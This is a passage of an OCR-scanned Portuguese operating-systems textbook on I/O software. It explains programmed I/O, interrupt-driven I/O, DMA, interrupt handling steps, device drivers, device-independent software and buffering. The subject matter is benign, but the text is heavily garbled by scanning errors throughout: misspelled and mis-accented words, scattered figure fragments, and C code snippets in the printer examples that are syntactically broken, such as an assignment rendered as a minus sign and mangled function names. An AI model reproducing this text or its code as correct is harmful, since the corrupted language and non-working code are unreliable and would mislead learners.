crona (orientada a interrupęao}. A maioria das E/S fisi- 
cas e assinerona — a CPU inicializa a iransferencia e segue 
fazendo outra atmdade ate receber uma interrupęao. Os 
programas do iisuario sao rnuito mais faceis de escrever 
quando as operaęoes de E/S sao bloqueantes — após uma 
cha ma da de sistema read o progrania e aut oma li ca menie 
suspenso ate quc os dados estejam dtóponfveis no bu ller. 
Fica a cargo do sistema opcracional fazer as operaęoes, dc 
fato orientadas a mterriipęao, pareccrem bloqueantes aos 
programas do usuario. 

Outra questao para os programas de E/S e a utilizacao 
de buffer para armazenamento temporario. Muitas vezes. 


os dados proveniemes de um disposilivo nao podem ser 
armazenados di re ta men te em seu destino. Por exempio, 
quando um pacote chega da rede, o sistema opcracional 
nao sabe onde armazena-io definitivamente enquamo nao 
tiver sido colocado em algum lugar para ser examinado. 
Alem disso, alguns disposilivos apresentam rcslrięocs se- 
veras dc tempo rcal (por cxcmplo, dispositivos dc audio 
digital), de modo que os dados devem ser anlecipadamenle 
colocados em um buffer de safda para separar a taxa com a 
qual o buffer e preenchido da iaxa com a qual de e esvazia- 
do, a firn de evitar seu completo esvaziamento. A utilizaęao 
de buffer para armazenamento temporario envolve muitas 
operaęoes de cópia e com frequenda gera um impacto sig- 
niflcativo no desempenho da E/S. 

O conceito finał quc mencionarcmos aqui 6 o de dispo- 
sitivos compaitilhados dedicados. Alguns dispositivos 
de E/S, como discos, podem ser usados por muitos usuarios 
ao mesmo tempo. O fato de varios usuarios terem arqui- 
vos abertos simullaneamente no mesmo disco nao acarrela 
qualquer problema. Outros dispositivos, como unidades de 
fi ta, devem ser dedicados a um unico usuario ate que este 
finałize suas operaędes. Entao, outro usuario pode usar 
a unidadc de lita. Definitivamente, nao e viavd ter dois 
ou mais usuarios cscrcvendo blocos alcatoriamentc c dc 
maneira interna lada na mesma fila, O uso de dispositivos 
dedicados (nao compartilhados) tambem gera unia serie 
de problem as, como os impasses. Novamente, o sistema 
operarional deve ser capaz de tratar tanio os dispositiyos 
compartilhados quamo os dedicados de uma maneira que 
eviie problemas. 

5,2.21 E/S progratnada 

Esistem tres diferenies maneiras fundamentais de rea- 
iizar E/S. Nesia scęao examinaremos o primeira delas, a E/S 
programada. Nas próxi.mas duas scęocs serao examinadas as 
outras: a E/S orientada a interrupęao e a E/S que usa DMA. 
A forma mais simples dc E/S e tera CPU fazendo todo o tra- 
balho. Esse metodo e cha mado de E/S programada. 

Esse metodo e rnuito simples tle iiustrarcom um exem- 
plo, Considere um processo de usuario que quer irnprimir a 
cadeia de caracteres de oito caractercs 'ABCDEFC.H" na ino 
pressora. Primetro ele monta a cadeia de caracteres em um 
bu ffernoespaęo do usuario, como mostrado na Figura 5.6 (a). 

O processo do usuario reąuisita entao a impressora 
para escrita por meio de uma ciiamada de sistema para 
abri-la. Se a impressora esta sendo usada por outro proces¬ 
so, essa chamada fal ha e retorna um código de erro ou um 
bloqueio ate que a impressora esteja dispomvel # dependen- 
do do sistema opcracional e dos parametros da chamada, 
Uma vcz quc tenha a impressora, o processo do usuario 
efetuara uma chamada de sistema para irnprimir a cadeia 
de caracteres na impressora. 

Normalnienie, o sistema opcracional entao copia o buf¬ 
fer com a cadeia de caracteres para um vetor — digamos, p — 
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no espaęo do nucleo, onde dc ć mais facilmente atessado 
(pois o nucleo pode pretisar trocar o mapa da memória 
para acessar o espaęo do usuario). Ele emao verifica se a 
impressora esia disponfrel no momentu; em caso negativo, 
ele espera ale que ela esteja. Logo que a impressora fica 
disponfrel, o sistema operadonal copia o primeiro caracte¬ 
re para o registrador de dados da impressora — no exem- 
plo dado r isso e feito mediante o uso da E/S mapeada na 
memória. Essa aęao ativa a impressora. O caractere pode 
nao aparcccr ainda porąue aigumas impressoras armaze- 
nam urna lin ha on urna pagina am es dc imprimir qualqucr 
coisa. No entanto, na Figura 5.6(b), vemos que o primeiro 
caractere foi impresso e que o sisiema marcou o ł W como o 
próxłmo caractere a ser impresso. 

Logo que de copia o primeiro caractere para a impres¬ 
sora, o sisiema operadonal verifica sc a impressora esta 
pronta para aceitar ciuro caractere. Em geral, a impressora 
tern um segundo registrador, quc contem sen status. O ato 
dc escrevcr para o registrador dc dados faz o status se tor- 
nar 'indispomvel'. Assim que o controlador da impressora 
processa o caraeiere atual, cle mdica sua disponibilidade 
marcando algum bit on colocando algum valor em sen re¬ 
gistrador de status, 

Nesseponto, o sisiema operadonal espera que a impresso¬ 
ra fique pronta novamente. Quando isso ocorre, ele imprime 
o caractere seguinte, como mostra a Figura 5.6(c). Essc laęo 
continua atc que toda a cadeia dc caraacres ten ha sido im- 
pressa* En tao, o controlc ret orna pata o proccsso do usuario. 

Os passos seguidos pelo sisiema operadonal sao resu- 
midos na Figura 5.7. Primeiro os dados sao copiados para 
o ntideo. En ta o, o sisiema operadonal entra em um laęo 
fechado que envia um caractere de cada vez para a saida. O 

copy. fromuser(buffer t p, cent); 

for (i=0; i < count; i++) { 

while (*printer_status_reg !=READY); 
*printer_data_register - p[ij; 

} 

rGturn_to_user(); 


aspecto essendal da E/S progi a mada, nitidamente ilustracja 
na figura, e que, após a saida de um caractere, a CPU comi- 
nu a men te verifica se o dispositivo esta pronto para aceitar 
outro. Esse eomportamento rnuitas vezes e cha mado de es¬ 
pera ocupada {busy wanimj) on poiling. 

A E/S programada ć simples mas tein a desvamagem 
de segurar a CPU o tempo lado atc que a E/S seja feita. Se 
o tempo para imprimir' um caractere far muito cuna (pols 
tudo o que a impressora esta fazendo e copiar o novo ca- 
ractere para um buffer interno), entao a espera ociosa sera 
coiwcniente. Aicm disso, cm um sisiema cmbarcado, no 
qual a CPU nao Lem nada mais para fazer, a espera ociosa e 
razoavd, Cont u do, em sistemas mais complexos, em que a 
CPU tern mitro trabalho a reaiizar, a espera ociosa e tnefi- 
ciente. Faz-se necessario um meihor metodo de E/S. 

5,2.51 |/S usando interrupcao 

Vamos agora considerar o caso da impressao em uma 
impressora que nao a rm a ze na os caracteres, mas imprime- 
-os um a um a medida que chegam. Sc a impressora pode 
imprimir cem caracteres por segundo, cada caractere leva 
10 ms para ser impresso. Isso significa que, após cada ca¬ 
ractere ser escrito no registrador de dados da impressora, 
a CPU pemianece em um laęo ocioso durante 10 ms espe¬ 
ra ndo a permissao para a salda do próximo caractere. Isso c 
mais do que o tempo necessario para fazer um chaveameri- 
lo dc contcxto e cxecutar algum outro proccsso durante os 
10 ms que de outra maneira seriam perdidos. 

Outro modo de permitlr que a CPU faęa outra coisa 
enquanto espera a impressao tornar-sc pronta ć usar inier- 
mpęóes. Ouando e feita unia chamada de sisiema para a 

r peo buffer do nucleo 7 
f* executa o faęo para cada caractere 7 
/" executa o laęo a te a impressora estar pronta*/ 
r envia um caractere para a saida 7 


i Figura 5.7 Como e escrita urna cadeia de caracteres para a impressora usando E/S programada. 
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impressao de urna cadeia de caracteres, o buffer e copiado 
para o espaęo do nudeo do sistema operarional, como mos- 
irado anteriormente, e o primeiro caractere e copiado para a 
impressora lao logoela concorde em aceita-lo. Nesse porno, 
a CPU chama o escalonador e outro processo e execinado. 
O processo que soliciiou a impressao da cadeia de carac- 
leres e bloąoeado ale que loda a cadeia seja impressa. O 
irabalho feito du ranie a cha mada de sistema e mostrado 
na Figura 5.8(a). 

Quando a impressora imprimiu um caractere e csta 
preparada para aeciiar o próximo, ela gera unia imer- 
rupęao. Essa interrupęao detćm o processo atnal e salva 
sen esiado. Enlao, a rotina de tratamento de imerrup- 
ęao da impressora e executada< Unia versao simples des- 
se código e most rad a na Figura 5*S(b)* Se na o existem 
mais caracteres para imprimir, o tratador de interrupęao 
execula alg unia aęao para desbloquear o usuario soli- 
citame. Caso contra rio, ele envia o caractere seguinte, 
eon firma o recebimento da imemipęao c retorna para o 
processo que estava exccutando antes da interrupęao, o 
qual continua a partir do porno em que tinha parado. 

5-2,41 E/s usando DMA 

Unia desvantagem óbvia do mecanismo de E/S orien- 
tada a interrupęao ć a ocorrćnda de unia interrupęao para 
cada caractere* Imcrrupęócs Ievam tempo, de modo que 
esse esquema desperdięa u ma certa quaiiEidade de te mpo 
de CPU* Uma soluęao e usar o acesso direto a memória 
{DMA). A ideia e fazer o comrolador dc DMA alimeniar os 
caracteres para a impressora um por vez, sem que a CPU 
seja perlurbada* Na verdadc, o DMA cxecuta E/S progra- 
mada, cm que somente o controJador dc DMA faz todo o 
irabalho, em vez da CPU principal. Essa estrategia requcr 
hardware cspcdal (o comrolador dc DMA). Uma simplifi- 
caęao do código e dada na Figura 5.9. 


A grandę vantagem do DMA e reduzir o nu mero de 
interrupęoes de uma por caractere para uma por buffer im- 
presso. Se existem muitos caracteres e as intermpędes sao 
lentas, esse sistema pode significar uma melhoria substan¬ 
cja L Por outro lado, o controlador de DMA e, em geral, 
muilo mais lento do que a CPU principal. Se o comrolador 
de DMA nao e capaz de dirigir o dispositivo em vdocida- 
de maxima on a CPU nao tem nada para fazer enquanto 
espera pela interrupęao do DMA, entao a E/S orientada a 
interrupęao ou mesmo a E/S programada podem ser mais 
yantajosas. Na jnaior parte das vczcs, o DMA valc a pena* 



Camadas do software de E/S 


O software de E/S normalnienie e organizado em qua- 
tro camadas, como mostrado na Figura 5JO, Cada camada 
tem uma funęao bem definida para executar e uma Inter- 
face tambem bem definida para as camadas adjacentes. A 
funcionalidade e as interfaces diferem de sistema para sis¬ 
tema, dc modo que a discussao que segue — quc cxamina 
todas as camadas partindo daquela de mvel mais baixo — 
nao e especffica de uma deierminada maquina. 


5.3.11 Tratadores de interrupęao 

Se, por um lado, a E/S programada e evenmalmente 
titil, por outro, para a maioria das E/S, as interrupęoes sao 
um falo desagradavel e nao podem ser evitadas. Elas deve- 
riam ser cscondidas nas entranhas do sistema operacional, 
de modo que a menor parte posswel dele soubesse dc sua 
exi$tentia. A mellior mandra de escondedas e bloąuear o 
driver que inicia lizen uma operaęao dc E/S ale que a E/S 
se compiete e a interrupęao ocorra* O driver pode bloquear 
a si próprio executando, por exemplo, uma operaęao down 


copy ,ffOm user(buffer, p, count); 

enabie _interrupt$(); 

while (* pri nte r_ status _reg != RE ADY) ; 

*printer data register =■ p|0]: 

scbeduler(); 


if (count == 0) { 
unt)lock_user(); 

} else { 

*printer data register = pfrj; 
count = count - 1; 
i = i + 1; 

} 

acknowledge_ .interrupt(); 
return _from_ i nterruptf); 


(a) 


(b) 


I Figura 5.8 Como escrever uma cadeia da caracteres na impressora usando E/S orientada a interrupęao. (a) Códtgo executado 
quando e feita a chamada de sistema para impressao. (b) Rotina de tratamento da interrupęao. 


copy_from_user(buffer, p, count); acknowIedgeJntemjpt{); 
set _ up _ D M A _ control le r{); unbfock_ user(); 

scheduier(); return_from _interrupt(); 


(a) 


(b) 


I Figura 5.9 A impressao de uma cadeia de caracteres usando o DMA. {a) Código executado quando e Feita a chamada de sistema 
print. (b) Rotina de tratamento da interrupęao. 
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Software de E/S no nfvel do usuario 


Software do sistema operacional independente do dispositivo 

Drivers do dispositivo 

Tratadores de interrupęao 

Hardware 


1 Figura 5*10 Camadas do software de E/S. 

sobi e urn semaforo, um wait sobrc inna variavd dc eon di- 
ęao, uin receive sobrc inna memagem, ou algo siinitar. 

Quando ocorre uma interrupęao, a rodna de manipu- 
łaęao de interrupęao faz o necessario para tratar a Inter- 
rupęao c depois pode desbloąuear o driver que a ehamou. 
Em alguns casos, cssa rotina apenas complctara a operaęao 
up sobrc urn semaforo. Em oulra situaęao, da emitira um 
signal sobrc u ma variavd dc condięao dc um monitor om 
ainda, cnviara u ma mensagem para o driver bloąueado. 
Em todos os casos, o efeito resultantc da interrupęao fara 
com que o driver previameme bloqueado esteja novanien- 
te aptoa executar. Esse modelo funciona bem sempre que 
os drivers sao estrumrados como processos do nucleo do 
sistema operacional, com sens próprios estados, suas pilhas 
e sens contadores de programa. 

Obvianieilte, na rcaiidade isso nao e tao sini pies* O 
proeessamento de u ma i nterrupęao nao e apenas urna 
ąuestao de interceptar inna interrupęao, executar um up 
sobre algum semaforo e, en tao, ex ecu tar u ma insiruęao 
IRET para retornar da interrupęao para o processo anterior. 
Existe ainda uma grandę quantidade de trabalho adicional 
para o sistema opera don a I realizar. Faremos entao um re- 
sumo desse trabalho, mostrando uma serie dc passos que 
devem ser cxecutados cm software após a imcrrupęao do 
hardware ter sido condufda. E necessario notar quc os de- 
talhes dcpcndcm niuito do sistema, dc modo que alguns 
dos passos rdacionados a seguir podem nao ser essenciais 
em uma determinada miqmna, bem como outros passos 
nao relacionados podem se fazer necessarios. Alem disso, 
os passos que ocorre ni podem estar em uma ordem dife- 
rente em algumas maqumas, 

1. Sałva quaisquer registradores (incluindo a PS W) 
que ainda nao foram salvos pelo hardware de Inter¬ 
rupęao. 

2. Estabelece um contexto para a rotina de iratamento 
da interrupęao. fsso pode envolver a configuraęao 
de TLB, MML) e uma tabela de paginas. 

3. Estabelece uma pilha para a rotina de trata niemo da 
interrupęao. 

4. Shializa o comrolador de interrupęao. Se nao existe 
um controlador de interrupęao ceniralizado, reabi- 
11 ta as imerrupęóes. 


5. Copia os registradores de onde cics foram salvos 
(possivclnieme dc algnma pilha) para a tabela dc 
processos. 

6. Executa a rotina dc trata niemo dc interrupęao. Ela 
cxtraira hiformaęócs dos registradores do comrola¬ 
dor do dispositivo que esta imerrompendo. 

7. Escolhc o próximo processo a exccutar. Sc a imer- 
rupęao dcixou pronto algum processo dc alta priori- 
dadc anterionnente bloąueado, estc pode ser csco- 
lliido para executar agora. 

S. Estabelece o contcxto da MMU para o próximo 
processo a cxccutar. Algtrni a jusie na TLB lambd m 
pode set necessario. 

9* Carrega os registradores do novo processo, indum- 
do su a PS W. 

10* Inidaliza a exetuęao do novo processo* 

Como se ve, o proeessamento da interrupęao esta łom 
ge de ser iriviaL Ele lambem usa um niimero considera- 
vel de insiruęoes da CPU, especialmente em maquinas nas 
quais a memória virtual esta presente e as tabelas de pagi¬ 
nas precisam ser atualizadas ou o estado da MMU tern de 
ser armazenado (por exemplo, os bits R e Af). Em algumas 
maquinas, a TLB e a cache da CPU tambem devem ser ajus- 
tadas durante a altemancia entre os modos micleo e usua- 
rio, que usam ddos de maquinas adieionais* 

5.3.2 I Drivers dos dispositivos 

Neste ca pitni o, primeiro abordatnos aqutlo que os con- 
troladores dos disposidvos fazem. Vimos que cada contro- 
lador tern alguns registradores do dispositivo u sad os para 
dar a ele comandos ou para ler seu status a partir dde, ou 
ambos os ca sos. O nu mero de registradores do disposiiivo 
e a naturę za dos comandos variani radicalmentc de dispo- 
sitivo para dispositivo. Por exemplo, um driver de mouse 
devc accitar informnęoes do mouse dizendo o quanto cle 
se movcu e qual botao foi pressionado. Em contrapartida, 
o driver do disco deve saber sobre setores, trilhas, eilindros, 
cabeęotes, moviniemo do braęo, comroladores do motor, 
tempos de ajuste do cabeęoie e sobre todas as deiuais nie¬ 
cą nicas que fazem o disco trabalbar corretamente. Obvia- 
mente, esses drivers sera o mitito diferentes. 
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Como conseqtienda P cada dispositivo de E/S ligado ao 
computador precisa de algum código especifko do disposi- 
iivo para eontrola-Io. Esse código, chamado de driver do 
dispositivo, em geral e escriio pelo [abricante do disposi- 
livo c fomecido com o dispositivo. Visto que cada sistcma 
opcradonal prccisa dc scus próprios diivcrs dos dispositi- 
vos, os fabricantcs normalnienie fomecem drivcrs para os 
sistemas operacionais mais populares. 

Cada driver de disposilivo normalnienie trata um tipo 
de dispositivo ou, no maximo, urna dasse de dispositivos 
fortemente relacionados. Por exemplo r um driver de dis¬ 
co SCSI pode tratar varios discos SCSI de diferentes tama- 
nhos c vcloddades c, talvez, um CD-ROlM SCSI tambem, 
Por outro lado, um monse e um joystick sao tao diferentes 
que se fazein necessarios drivers diferentiados. No entanto, 
nao exi$te nenliuma restrięao tętnica em ter um driver de 
disposilivo que controle varios tlisposiiivos diferentes. Sim- 
pleśnienie nao e uma boa ideia. 

Para acessar o hardware do dispositivo — isto c, os rc- 
gislradorcs do controlador —, o drivcr do dispositivo nor¬ 
malnienie dcvc ser parte do nudeo do sistcma opcradonal 
pelo menos nas arąuiteturas aluais, Na verdade H e possfvd 
construir drivcrs que exccutem no espaęo do usuario, com 


ehamadas de sistema para leitura e escrita nos registrado- 
res do dispositivo. Esse projeto isola o nudeo do sistema 
operadonal dos drivers, c os drivers entre si r ellminando a 
maior causa das quebras dos sistemas — drivers defeituosos 
que, dc alguma maiidra, interierem no mi cle o do sistcma 
opcradonal Para construir sistemas altameiitc confiavcis P 
estc definitivamcntc e o caminho a seguir. Um cxcmplo 
dc um sistema no qual os ddvers do dispositivo executam 
como processos do usuario e o M1N'IX 5, Contudo, visto 
que os sistemas operacionais ansais esperam que os drivers 
dos dispositiyos exeauem no modo niideo, este sera o mo- 
delo considerado neste livro. 

Unia vez que os projetistas dc cada sistcma opcradonal 
sabem quais pcdaęos dc código (drivers) cscritos por ter- 
ceiros seta o instaladas no sistcma opcradonal este predsa 
dc uma arquitetura que permita essa instalaęao, Isso signi- 
fica ter um modelo bem defmido daąuilo ąue o t!river faz 
e como ele inierage com o restante do sistema operadonal 
Drivers dos dispositivos sao, em geral, posicionados abaixo 
do restante do sistema operadonal como ilustrado na Fi¬ 
gura 5.11. 

Os sistemas operacionais geral menie dassificam os dri- 
vers entre algumas poucas categorias. As categorias mais 


Espaęo do/ 
usuario 


Espaęo do/ 
nucleo 


Hardware 


Processo do usuario 



Dispositivos 







Figura 5.11 Posicionamento lógico dos drivers de disposśtivo$. Na verdade r loda corrtunicaęao entre os drivers e os controladores 
passa pelo barramento. 
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comuns sao dispositivos de bloco — como discos, que 
cantem varios blocos dc dados que podem ser endereęa- 
dos independent emente — e dispositivos de caractere, 
como tcckidos e impressoras, os quais geram on aceitam 
uma seąiićn da dc caracteres. 

A maioria dos sistemas operacionais define uma inter- 
face padrao para todos os drivers de blocos e uma segunda 
imerface padrao para todos os drivers de caracteres. Essas in- 
terfaces coiisistem em um nu mero dc procedimentos que o 
restante do sistema operadonal pode utilizar para fazer o dri- 
ver trabalhar para elc. Entre os procedimentos tipi cos esta o 
aqucles para a leitura de um bloco (dispositivo dc bloco) on a 
cscriia dc uma cadcia de caracteres (dispositivo de caractere). 

Em alguns sistemas, o sistema operadonal e urn unico 
programa binario que contem, compilados em conjunto, to¬ 
dos os drivers de que de predsa. Esse esquema serviu de base 
durante anos para os sistemas UNIX porque des eram exe- 
cutados nos centros computa clona is e os dispositivos de E/S 
raramenrc crarti trocados. Se um novo dispositivo era adirio- 
nado, o administrador do sistema simplcsmcnte rccompilava 
o nu cl co com o novo driver para construir um novo binario. 

Com o advento dos computadores pessoais, com mi- 
lhares de opęóes de dispositivos de E/S, esse modele deixou 
de ser funrionaL Poucos usuarios sao capazes de recompilar 
ou rdigar o nócleo, mesmo que des tenham o código-fonte 
ou os modulos-objęto, o que nem sempre e o caso, Em 
vez disso, os sistemas operarionais, comcęando com o MS- 
DOS, se tomerteram para um modele no qual os drivers 
podem ser dinamicamente carregados no sistema d u ran te 
a execuęao- Sisicmas dilerentes fazem o carregamemo dos 
drivers de maneiras dwersas. 

Um driver dc dlspositwo apresenta varias ftmęoes. 
A mais óbvia ć accitar c execuiar requisięócs abstratas, 
dc lei litra ou gravaęao, de um software independente dc 
dispositivo localizado na ca ma da aciina da ca mada de dri- 
vers dos disposiiivos. Mas lambem exisiem algumas pou- 
cas outras funęoes que ele tern de executar. Por exemplo, 
o driver deve inicializar o dispo$itivo, se necessario. Hle 
tambćm pode precisar iratar su as nccessidadcs de energia 
e registrar seus eventos* 

Mttiios drivers dos dispositivos tern uma estrutura ge- 
ral similar. Um driver tipico inicializa venfieando os para- 
metros de emrada para ver se eles sao validos. Em caso 
negativo, umerro e retornado. Se eles sao validos, uma tra¬ 
ci uęao — do abstrato para concreto — pode ser necessaria. 
Para um driver de disco, isso talvez implique a conversao 
de um mrniero de bloco linear em mini eros do cabeęote, 
trilha, setor e cilindro para a geometria do disco. 

Em seguida, o driver pode verilicar se o dispos!livo esta 
alualmente em uso. Em caso afirmativo, a reqiiłsięao sera 
enfileirada para posterior processamento. Se o dispositivo 
estiver ocioso, o status do hardware sera examinado para 
ver se a requisięao pode ser trata da imediata menie, Talvez 
seja liecessario ligar o disposkivo ou um motor antes de ini- 


cializara trans ferencia. Uma vez quc o disposiiivo esta liga- 
do e pronto para Irabalhar, o controle atual pode comeęar. 

Comrolar o dispositivo significa emitir uma seąuencia 
dc comandos para de, O drivcr e o local ornie a sequcu¬ 
da de comandos e deierminada, dependendo daquilt> que 
deve ser feito. Depois dc saber quais comandos deve emitir, 
ele comeęa a escreve-los nos registradores do comrolador 
do disposilim Após escrever cada comando para o comro¬ 
lador, ele pode precisar verificar se o comrolador aceitou o 
comando e se esta p repa rado para accitar o proximo. Essa 
sequencia continua ate quc todos os comandos tenham sido 
emitidos, Alguns eon troi adores podem rcceber uma lista cn- 
cadeada de comandos (na tnemória), tendo de ler e proces- 
sar todos eles sem qualquer ajuda do sistema operadonal. 

Após os comandos terem sido emitidos, uma entre duas 
situaęóes ocorrcra. Em muitos casos, o driver do dispositivo 
espera atć que o controlador faęa algum trabalho para elc, 
dc modo que elc se autobioqueia atć que uma interrupęao 
venha a desbloquca-lo. Em outros casos, porem, a opera- 
ęao filializa sem atraso, de mandra quc o driver nao precise 
se bloąuear. Eis um exemplo da segunda situaęao: a rola- 
gem da lela de yfdeo em modo caractere requer somente 
a cscrita de poucos bytes nos registradores do controlador. 
Nenhum movimento mecanico e necessario, de modo que 
a opera^ao toda pode ser completada em nanossegundos. 

No primeiro caso, o drivcr bloqueado sera acordado pcla 
imerrtipęao. No segundo, de nunca dormira. Em ambos os 
casos, após a o peta ęao ter sido completada, o drivei deve 
verificar a ocorrćnda dc erros. Sc tudo esiiver bem, o dnvcr 
pod era ter dados para passar para o software independen¬ 
te do dispositivo (por exemplo, um bloco lido naqucle mo- 
mento). Por firn, de ret orna a o processo chama dor alguma 
informacao de status para o rdatório dos erros. Sc qualqucr 
outra rcquisięao cstivcr pendente, uma dclas podera, ago¬ 
ra, ser sdecionada e inidalizada, Se nada esta pendente, o 
dnver bloąueia a si próprio a espera da próxima reąuisięao. 

Esse modelo simples e somente uma aproximaęao do que 
ocorrc na realidade. Muitos fatores tomam o código muito 
mais complicado. Primeiro, um dispositivo de E/S pode com- 
pietar uma tarcia enquamo um diivcr esta executaruio, com 
isso interrompendo o driver. A interrupęao pode colocar um 
dnver em execuęao. Dc fato, ele tem a capaddade ile 
fazer o driver atual executar novamcnie. Por exemplo, en- 
quamo o drivcr de rede processa um pacote qtte esta chegan- 
do, outro pacote pode chegar em seguida. ConseqLientemen- 
te, os drieers tem de ser reentrantes, o que significa que um 
driver devc supor que ele pode ser ehamado uma segunda 
vez antes que a primeira chamada tenha sido concluida. 

Em muitos sistemas manuseaveis cm opera ęao (hot 
pktggabk systems}, os dispositivos sao adidonados ou rcmo- 
vidoś cnquamo o computador esla executando. Como eon- 
sequencia, enquanto um driver esta ocupado lendo a partir 
de algum dispositivo, o sistema pode inlorma-lo que o usua- 
rioremoveu repentinamente aquele dispositivo do sistema. 
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A transferenda de E/S atual nao só deve ser abortada sem 
dani Ikar quaisquer estruturas de dados do mideo, mas 
tambem quaisquer rcquisię5es pendemes para o dispositi- 
vo recem-diniinado devem ser cuidadosamcme removidas 
do sistema c as mas norfcias predsam ser dadas aos proces- 
sos qne as rcqnisitaram, Al cm disso, a adięao inesperada dc 
iiovos dispositivos pode fazer com quc o nucleo mcxa nos 
recursos (por exemplo, linhas de requisięao dc interriip- 
ęao), tirando os mais antigos do driver e dando-lhe outros 
novos em seu lugan 

Os drivers nao sao aptos a fazer chamadas de sistcma, 
mas des miiitas vczcs predsam interagir com o resto do 
nucleo- Em geral, sao permitidas chamadas a ccrtos pro- 
cedimentos do nucleo* Por cxcmplo, existem chamadas 
para alocar c liberar paginas ftsicas de me morfa para serem 
usadas como buffers, Oiuras chamadas uieis sao necessarias 
para ogerenciamento da MMU, dos relógios, do comrolador 
de DMA, do comrolador de imerrupęao e assim por dianie. 

_ 5.3.51 Software de E/S independente de 

dispositivo 

Embora algurna pane do software de E/S possa ser es- 
pecffica do di$positivo, outras paries sao independenies. A 
fromeira exata entre os drivers e o software independente 
de dispositwo varia de acordo com o sistema (e o disposi- 
tivo), pois algumas funęoes passfvcis de ser fdtas dc modo 
independente de disposilivo podem realnienie ser realiza- 
das nos ddvcrs, por ąuestdes de efidencia on outras razóes. 
As funęoes mostradas na Tabela 5,2 cm geral sao feitas no 
software independente dc dispositwo* 

As funęoes basicas de urn software independente de 
dispostlwo sao executar as funęoes de E/S eomuns para in¬ 
dos os dispositivos c fornccer urna interface miliomie para 
o software no mvd do usuario. A seguir veremos essas 
questdes com mais dclalhes. 

Interface uniforme para os drivers dos dispositivos 

Urna questao importante em um sistema operadonal e 
como fazer todos os dispositivos de E/S e drivers parecerem 
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Orive/ da 
impressora 

(a) 


Driyerdo 
teclado 


Uniformizar interfaces para os diwers de dispositivos 
Armazertar no buffer 


Reportar erros 

Atocar e liberar di$positivos dedicados 

Providenciar um tamanho de bloco independente de dispositivo 


I Ta beta 5.2 Funęoes do software de E/S independente de 
dfSpQSttivO. 


mais ou menos os mesmos. Se discos, impressoras, tedados 
etc. possuem interfaces diferemes, cada vez que um novo 
dispositivo aparece, o sistema operadonal devc ser modili¬ 
ca do para o novo dispositivo. Ter de rcconsiruir o sistema 
operadonal para cada dispositivo nao e unia boa esrrategia, 

Um aspecto dessa qtiestao e a interface entre os dri- 
vers dos dispositivos e o restante do sistema operadonal 
Na Figura 5.12(a), ilustramos a situaęao na qual cada drl- 
ver de dispositivo apresenta unia interface difercnle para o 
sistema operadonal Isso signilka quc as Funęoes do drivcr, 
dispomvds para serem chamadas pelo sistema, diferem 
dc driver para dnver. Isso tambem pode significar que as 
funęoes do nucleo reąueridas pelo driver tambem diferem 
de driver para driver. Considerando conjumamente essas 
questoes, lemos que, para fornccer unia interface para cada 
novo driver, e necessario um novo grandę esforęo de pro- 
gra maęa o. 

Por outro lado, na Figura 5.12(b), mostiamos um pro- 
jcto diferente no qual todos os diivers tern a mesma in¬ 
terface, Nesse caso, torna-se muito mais facit acoplar um 
novo driver, desde que ele esteja em conformtdade com a 
interface do driver. Isso tambem signiftca que os escritores 
de drivers sabem o qi:e se espera deles [ou seja, quais ftm- 
ędes eles devem fornccer e quais funęoes do nucleo eles 
podem chamar). Na pratica, nem todos os dispositivos sao 
absolutamente identicos, mas existe, em geral um pcque- 
no niimcro de lipos de dispositivo, c niesmo csses sao, nor¬ 
malnienie, muito parecidos. 
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I Figura 5.12 (a) Sem uma interface-padrao para o driver. (b) Com oma interface-padrśo para o driver. 
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O funtionamemo se da da seguinte maneira: para cada 
classe de disposilivos, como discos on impressoras, o siste- 
ma operacional define um conjimto de funęoes que devem 
ser complemeniados pelo driver. No caso de um disco, as 
lunębes certamente induiriam leitura c cscrita, mas nim¬ 
bem a ligaęao c o desligamcnto, a formataęao, entrc outras 
coisas. Em geraL o di ivcr contem urna tabela com ponteiros 
yoltados para essas funęoes, Q u a udo o driver e catregado, 
o sistema operacional registra o endereęo dessa tabela para 
que, ąuando necessite chama r u ma dessas funęoes, possa 
faze-lo de forma indireta por meio da tabela de ponteiros. 
Essa tabela define a imerface entre o driver e todas as ou¬ 
tras partes do sistema operacional. Todos os disposiiivos de 
lima determinada classe (discos, impressoras etc.) devem 
obedecer a csse procedimento. 

O u tr o aspecto que surge ąuando se tern u ma interfate 
unifonne e como os disposiiivos de E/S sao nomeados. O 
software independente de disposilivo aiida do mapeamen- 
to de nomes de dispositivos simbóHcos sobre o driver apro- 
priado. No UNIX, por exemplo, um nome do dispositivo, 
como /dev/diskO t espedfka de modo unico o i-node para 
um arquivo especial e csse i-node contem o nu mero do 
dispositiva principal {major deme number), usado para 
Iocalizar o driver apropnado. O i-node contem ainda o nu- 
mero do dispositivo secundario [minor dwice number), 
o c]na3 e passado como lim parametro para o driver com o 
propósito de especificar a unidade a ser lida ou cscriia, To¬ 
dos os disposltivos tern numcros principal e secundario, c 
todos os drivers sao acessados medianie o uso do numero 
principal, que scleciona odriver, 

istrciiamente relacionada com a nomcaęao esta a pro- 
teęao. Como o sistema impede os usuarios de acessarem os 
dispositivos que des nao estao autorizados a acessar? Nos 
sistemas UN1X e Windows 2000, os dispositivos aparecem 
no sistema de arquivos como objetos nomeados, indicando 
que as regras de proieęao usuais para os arquivos tambern 
sao aplicadas aos dispositivos dc E/S. O admhiistrador do 
sistema pode, entao, aj u star as permissoes mais adcquadas 
para cada dispositivo. 


Utilizaęao de buffer 

Por varias razdes, a utilizaęao de huffer e u ma ąuestao 
irnporlanic para os dtsposilivos tanio dc blocos como de ca¬ 
racteres. Para conhecer urna delas, considere um processo 
que qtier ler dados de um modem. Urna estrategia posslvd 
para o tratamento dos caracteres que che gam e o usuario 
fazer urna chamada dc sistema read e bloqucar a espera de 
um. caraclere. Cada caraclere que chega causa urna inier- 
rupęao, A rolina de iratamemo da interrupęao passa o ca¬ 
raclere para o processo do usuario e o desbloqtieia. Após 
coloca r o caraclere em algum lugar, o processo le outro ca¬ 
raclere e bloąueia novamente. Hsse modelu e indicado na 
Figura 5,13(3), 

A desvamagem desse metodo e que o processo do usua¬ 
rio precisa ser iriicializado para cada caraclere que chega. 
Permiiir que um processo execuie muitas vezes durante 
cttrtos intervalos de tempo e meficiente, de modo que esse 
projeto nao e u ma boa opęao. 

Um modo de mci hora-lo e most rad o na Figura 5.13(b), 
qtie ilustra a seguinte situaęao: o processo do usuario for- 
nece um buffer tle n caracteres no espaęo do usuario e faz 
a leitura de n caracteres. A rolina de tratamento da inter- 
rupęao coloca os caracteres que chegam nesse buffer ale 
precnche-io, Ela entao acorda o processo do usuario. Esse 
esquema e bcm mais efkiente do que o anterior, mas tam- 
